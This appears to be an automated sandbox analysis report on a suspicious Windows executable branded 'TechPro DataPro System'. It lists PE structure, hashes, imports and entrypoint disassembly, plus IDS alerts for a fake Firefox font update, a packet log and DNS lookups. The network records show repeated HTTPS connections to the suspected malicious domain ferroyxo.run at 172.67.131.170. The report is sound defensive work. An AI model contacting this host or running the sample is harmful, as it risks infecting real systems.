                                                                        File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...;..g.................z...j......P.............@..........................0............@.....................................<..
                                                                        Icon Hash:90cececece8e8eb0
                                                                        Entrypoint:0x468550
                                                                        Entrypoint Section:.text
                                                                        Digitally signed:false
                                                                        Imagebase:0x400000
                                                                        Subsystem:windows gui
                                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                        Time Stamp:0x67E8013B [Sat Mar 29 14:18:35 2025 UTC]
                                                                        TLS Callbacks:
                                                                        CLR (.Net) Version:
                                                                        OS Version Major:6
                                                                        OS Version Minor:0
                                                                        File Version Major:6
                                                                        File Version Minor:0
                                                                        Subsystem Version Major:6
                                                                        Subsystem Version Minor:0
                                                                        Import Hash:71f2fc6f961ae32c66027ae469c38c53
                                                                        Instruction
                                                                        call 00007FA0B0AABB00h
                                                                        call 00007FA0B0AAF72Bh
                                                                        call 00007FA0B0AB2F96h
                                                                        call 00007FA0B0AB66C1h
                                                                        call 00007FA0B0AB96BCh
                                                                        call 00007FA0B0ABC357h
                                                                        call 00007FA0B0AC1F72h
                                                                        call 00007FA0B0AC4D3Dh
                                                                        call 00007FA0B0AC8918h
                                                                        call 00007FA0B0ACD973h
                                                                        call 00007FA0B0AD166Eh
                                                                        call 00007FA0B0AD5369h
                                                                        call 00007FA0B0ADA274h
                                                                        call 00007FA0B0ADDB4Fh
                                                                        call 00007FA0B0AE23AAh
                                                                        call 00007FA0B0AE5F15h
                                                                        call 00007FA0B0AEA4A0h
                                                                        call 00007FA0B0AECA7Bh
                                                                        call 00007FA0B0AF0AB6h
                                                                        call 00007FA0B0AF5711h
                                                                        call 00007FA0B0AFA69Ch
                                                                        call 00007FA0B0AFD4A7h
                                                                        call 00007FA0B0B01502h
                                                                        call 00007FA0B0B04FCDh
                                                                        call 00007FA0B0B07C78h
                                                                        call 00007FA0B0B0A823h
                                                                        call 00007FA0B0B0F95Eh
                                                                        call 00007FA0B0B12AA9h
                                                                        test eax, eax
                                                                        jne 00007FA0B0B12A92h
                                                                        call 00007FA0B0AAB980h
                                                                        push 000000FFh
                                                                        call dword ptr [004698BCh]
                                                                        push 00000000h
                                                                        call dword ptr [004698BCh]
                                                                        int3
                                                                        int3
                                                                        int3
                                                                        int3
                                                                        int3
                                                                        int3
                                                                        int3
                                                                        int3
                                                                        push ebp
                                                                        mov ebp, esp
                                                                        push ebx
                                                                        push edi
                                                                        push esi
                                                                        and esp, FFFFFFF8h
                                                                        sub esp, 000002A8h
                                                                        lea eax, dword ptr [esp+54h]
                                                                        push eax
                                                                        call dword ptr [000098CCh]
                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x697f40x3c.rdata
                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0xc70000x2e69.rsrc
                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0xca0000x831c.reloc
                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x698b40x84.rdata
                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                        .text0x10000x679330x67a00e799d022f8043e1027820d7029de2b24False0.5544212718636912data6.099887056721714IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                        .rdata0x690000xb360xc00f508e94a0d8ca49d8c474207e03c7890False0.5257161458333334Matlab v4 mat-file (little endian) \3551\206\230\373\264\310:\317O\274Xses?\276H\315\274\336\236&/\014\0107\2359\201)\272\022\376\257\227\362\354D\220\024\253\371\343\020\035\343\356Cn\340\020\264\021\343\210\312\327f\351, numeric, rows 3296, columns 4096, imaginary4.801213516305022IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                        .data0x6a0000x5ae000x5a6009fd8572f91bd71e73607ab4ae7d92638False1.0000459241009683data7.999214056877976IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                        .CRT0xc50000x40x200fa59424a48b8f68036a05001c1f92210False0.03125data0.06116285224115448IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                        .Dota0xc60000x600x200bf619eac0cdf3f68d496ea9344137e8bFalse0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                        .rsrc0xc70000x2e690x30003a75e6b37623d4e2a39a18e0d78ff559False0.23592122395833334data3.5378064234923166IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                        .reloc0xca0000x831c0x8400d127f0dc7404dddbf97ddd292674ccbfFalse0.7922585227272727data6.837145678856392IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                        RT_MENU0xc73a00x3a2data0.26129032258064516
                                                                        RT_MENU0xc77440x744data0.20376344086021506
                                                                        RT_MENU0xc7e880x1d8data0.336864406779661
                                                                        RT_MENU0xc80600x756data0.19808306709265175
                                                                        RT_MENU0xc87b80x634data0.21536523929471033
                                                                        RT_DIALOG0xc8dec0x212data0.5037735849056604
                                                                        RT_DIALOG0xc90000x184data0.5463917525773195
                                                                        RT_DIALOG0xc91840x314data0.4213197969543147
                                                                        RT_STRING0xc94980x23cdata0.3706293706293706
                                                                        RT_STRING0xc96d40x1f4AmigaOS bitmap font "t", fc_YSize 28672, 21248 elements, 2nd "o", 3rd0.39
                                                                        RT_ACCELERATOR0xc98c80x70data0.7946428571428571
                                                                        RT_ACCELERATOR0xc99380x50data0.875
                                                                        RT_ACCELERATOR0xc99880x50data0.8875
                                                                        RT_ACCELERATOR0xc99d80x40data0.953125
                                                                        RT_VERSION0xc9a180x244data0.5465517241379311
                                                                        RT_MANIFEST0xc9c5c0x20dXML 1.0 document, ASCII textEnglishUnited States0.5352380952380953
                                                                        DLLImport
                                                                        KERNEL32.dllCloseHandle, CreateToolhelp32Snapshot, ExitProcess, GetCommandLineW, GetLastError, GetModuleHandleW, GetSystemInfo, GetTickCount, GlobalMemoryStatusEx, Process32FirstW, Process32NextW, Sleep, lstrcmpiW
                                                                        USER32.dllBeginPaint, DefWindowProcW, DestroyWindow, DispatchMessageW, DrawTextW, EndPaint, FillRect, GetDC, GetMessageW, LoadCursorW, PostQuitMessage, RegisterClassExW, ReleaseDC, SetCursor, SetFocus, ShowWindow, TranslateMessage, UpdateWindow
                                                                        DescriptionData
                                                                        CompanyNameTechPro
                                                                        FileDescriptionProcess network
                                                                        FileVersion2.36.213.3383
                                                                        ProductNameDataPro System
                                                                        LegalCopyright 2025 TechPro
                                                                        InternalNameProTech
                                                                        Translation0x0409 0x04e4
                                                                        Language of compilation systemCountry where language is spokenMap
                                                                        EnglishUnited States

                                                                        Download Network PCAP: filteredfull

                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                        2025-04-02T11:42:45.533112+02002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749681172.67.131.170443TCP
                                                                        2025-04-02T11:42:46.849307+02002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749682172.67.131.170443TCP
                                                                        2025-04-02T11:42:48.236401+02002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749683172.67.131.170443TCP
                                                                        2025-04-02T11:42:49.246361+02002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749684172.67.131.170443TCP
                                                                        2025-04-02T11:42:51.223014+02002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749685172.67.131.170443TCP
                                                                        2025-04-02T11:42:52.409357+02002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749686172.67.131.170443TCP
                                                                        2025-04-02T11:42:54.175757+02002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749687172.67.131.170443TCP
                                                                        • Total Packets: 99
                                                                        • 443 (HTTPS)
                                                                        • 53 (DNS)
                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                        Apr 2, 2025 11:42:45.311676979 CEST49681443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:45.311729908 CEST44349681172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:45.311795950 CEST49681443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:45.314977884 CEST49681443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:45.314996004 CEST44349681172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:45.533039093 CEST44349681172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:45.533112049 CEST49681443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:45.537491083 CEST49681443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:45.537504911 CEST44349681172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:45.537789106 CEST44349681172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:45.582853079 CEST49681443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:45.589519024 CEST49681443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:45.589519024 CEST49681443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:45.589770079 CEST44349681172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:46.039433956 CEST44349681172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:46.039557934 CEST44349681172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:46.039614916 CEST49681443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:46.039644957 CEST44349681172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:46.039717913 CEST44349681172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:46.039768934 CEST49681443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:46.039777040 CEST44349681172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:46.039895058 CEST44349681172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:46.039947033 CEST49681443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:46.039954901 CEST44349681172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:46.040081024 CEST44349681172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:46.040124893 CEST49681443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:46.040132046 CEST44349681172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:46.040725946 CEST44349681172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:46.040774107 CEST49681443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:46.040781975 CEST44349681172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:46.040875912 CEST44349681172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:46.040921926 CEST49681443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:46.040929079 CEST44349681172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:46.082885027 CEST49681443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:46.141397953 CEST44349681172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:46.141609907 CEST44349681172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:46.141704082 CEST44349681172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:46.141729116 CEST49681443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:46.141748905 CEST44349681172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:46.141807079 CEST49681443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:46.141813993 CEST44349681172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:46.141972065 CEST44349681172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:46.142024040 CEST49681443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:46.142034054 CEST44349681172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:46.142216921 CEST44349681172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:46.142263889 CEST49681443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:46.142271042 CEST44349681172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:46.142385960 CEST44349681172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:46.142441988 CEST49681443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:46.142450094 CEST44349681172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:46.142551899 CEST44349681172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:46.142640114 CEST49681443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:46.142647982 CEST44349681172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:46.142748117 CEST44349681172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:46.142797947 CEST49681443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:46.142803907 CEST44349681172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:46.142990112 CEST44349681172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:46.143049002 CEST49681443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:46.145817041 CEST49681443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:46.145838022 CEST44349681172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:46.145848036 CEST49681443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:46.145853043 CEST44349681172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:46.636013031 CEST49682443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:46.636049986 CEST44349682172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:46.636142015 CEST49682443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:46.636420965 CEST49682443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:46.636435986 CEST44349682172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:46.849170923 CEST44349682172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:46.849307060 CEST49682443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:46.850704908 CEST49682443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:46.850719929 CEST44349682172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:46.851072073 CEST44349682172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:46.852328062 CEST49682443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:46.852464914 CEST49682443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:46.852488995 CEST44349682172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:47.378072977 CEST44349682172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:47.378209114 CEST44349682172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:47.378258944 CEST49682443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:47.378355980 CEST49682443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:47.378375053 CEST44349682172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:48.033591032 CEST49683443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:48.033664942 CEST44349683172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:48.033751011 CEST49683443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:48.034084082 CEST49683443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:48.034101963 CEST44349683172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:48.236269951 CEST44349683172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:48.236401081 CEST49683443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:48.237664938 CEST49683443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:48.237675905 CEST44349683172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:48.237921000 CEST44349683172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:48.239198923 CEST49683443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:48.239327908 CEST49683443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:48.239356995 CEST44349683172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:48.239409924 CEST49683443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:48.239415884 CEST44349683172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:48.787517071 CEST44349683172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:48.787636995 CEST44349683172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:48.787934065 CEST49683443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:48.789530039 CEST49683443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:48.789547920 CEST44349683172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:49.035032988 CEST49684443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:49.035089970 CEST44349684172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:49.036088943 CEST49684443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:49.041476965 CEST49684443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:49.041512966 CEST44349684172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:49.246228933 CEST44349684172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:49.246361017 CEST49684443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:49.247682095 CEST49684443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:49.247699976 CEST44349684172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:49.247958899 CEST44349684172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:49.249392033 CEST49684443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:49.249510050 CEST49684443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:49.249538898 CEST44349684172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:49.249591112 CEST49684443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:49.249602079 CEST44349684172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:49.834147930 CEST44349684172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:49.834321976 CEST44349684172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:49.834388971 CEST49684443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:49.834508896 CEST49684443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:49.834527016 CEST44349684172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:51.018771887 CEST49685443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:51.018831968 CEST44349685172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:51.018970966 CEST49685443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:51.019515038 CEST49685443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:51.019526958 CEST44349685172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:51.222918987 CEST44349685172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:51.223014116 CEST49685443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:51.224272966 CEST49685443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:51.224282980 CEST44349685172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:51.224524975 CEST44349685172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:51.225707054 CEST49685443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:51.225877047 CEST49685443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:51.225900888 CEST44349685172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:51.742768049 CEST44349685172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:51.742886066 CEST44349685172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:51.742965937 CEST49685443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:51.743225098 CEST49685443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:51.743247032 CEST44349685172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:52.206156969 CEST49686443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:52.206211090 CEST44349686172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:52.206284046 CEST49686443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:52.206621885 CEST49686443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:52.206638098 CEST44349686172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:52.409286976 CEST44349686172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:52.409357071 CEST49686443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:52.410897970 CEST49686443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:52.410904884 CEST44349686172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:52.411147118 CEST44349686172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:52.431097031 CEST49686443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:52.432260990 CEST49686443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:52.432286978 CEST44349686172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:52.432374954 CEST49686443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:52.432399988 CEST44349686172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:52.432487965 CEST49686443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:52.432534933 CEST44349686172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:52.432837009 CEST49686443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:52.432854891 CEST44349686172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:52.432987928 CEST49686443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:52.433002949 CEST44349686172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:52.433088064 CEST49686443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:52.433099031 CEST44349686172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:52.433140039 CEST49686443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:52.433180094 CEST49686443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:52.433202028 CEST49686443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:52.476279974 CEST44349686172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:52.476459980 CEST49686443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:52.476505995 CEST49686443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:52.476515055 CEST49686443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:52.520287037 CEST44349686172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:52.520402908 CEST49686443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:52.520494938 CEST49686443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:52.520535946 CEST49686443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:52.564290047 CEST44349686172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:52.564522982 CEST49686443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:52.612273932 CEST44349686172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:52.631499052 CEST44349686172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:53.922930002 CEST44349686172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:53.923063993 CEST44349686172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:53.923130035 CEST49686443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:53.923227072 CEST49686443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:53.923243999 CEST44349686172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:53.974617004 CEST49687443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:53.974657059 CEST44349687172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:53.974735022 CEST49687443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:53.975181103 CEST49687443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:53.975203991 CEST44349687172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:54.175365925 CEST44349687172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:54.175756931 CEST49687443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:54.180274010 CEST49687443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:54.180291891 CEST44349687172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:54.180600882 CEST44349687172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:54.181925058 CEST49687443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:54.181925058 CEST49687443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:54.182033062 CEST44349687172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:54.698894024 CEST44349687172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:54.698961973 CEST44349687172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:54.699088097 CEST49687443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:54.699331045 CEST49687443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:54.699348927 CEST44349687172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:54.699361086 CEST49687443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:54.699368000 CEST44349687172.67.131.170192.168.2.7
                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                        Apr 2, 2025 11:42:45.181822062 CEST6351153192.168.2.71.1.1.1
                                                                        Apr 2, 2025 11:42:45.298235893 CEST53635111.1.1.1192.168.2.7
                                                                        Apr 2, 2025 11:43:00.279706001 CEST6115853192.168.2.71.1.1.1
                                                                        Apr 2, 2025 11:43:00.377604008 CEST53611581.1.1.1192.168.2.7
                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                        Apr 2, 2025 11:42:45.181822062 CEST192.168.2.71.1.1.10xded0Standard query (0)ferroyxo.runA (IP address)IN (0x0001)false
                                                                        Apr 2, 2025 11:43:00.279706001 CEST192.168.2.71.1.1.10xaf79Standard query (0)c.pki.googA (IP address)IN (0x0001)false
                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                        Apr 2, 2025 11:42:45.298235893 CEST1.1.1.1192.168.2.70xded0No error (0)ferroyxo.run172.67.131.170A (IP address)IN (0x0001)false
                                                                        Apr 2, 2025 11:42:45.298235893 CEST1.1.1.1192.168.2.70xded0No error (0)ferroyxo.run104.21.4.48A (IP address)IN (0x0001)false
                                                                        Apr 2, 2025 11:42:59.953512907 CEST1.1.1.1192.168.2.70x8627No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                        Apr 2, 2025 11:42:59.953512907 CEST1.1.1.1192.168.2.70x8627No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                        Apr 2, 2025 11:43:00.377604008 CEST1.1.1.1192.168.2.70xaf79No error (0)c.pki.googpki-goog.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                        Apr 2, 2025 11:43:00.377604008 CEST1.1.1.1192.168.2.70xaf79No error (0)pki-goog.l.google.com172.217.165.131A (IP address)IN (0x0001)false
                                                                        • ferroyxo.run
                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
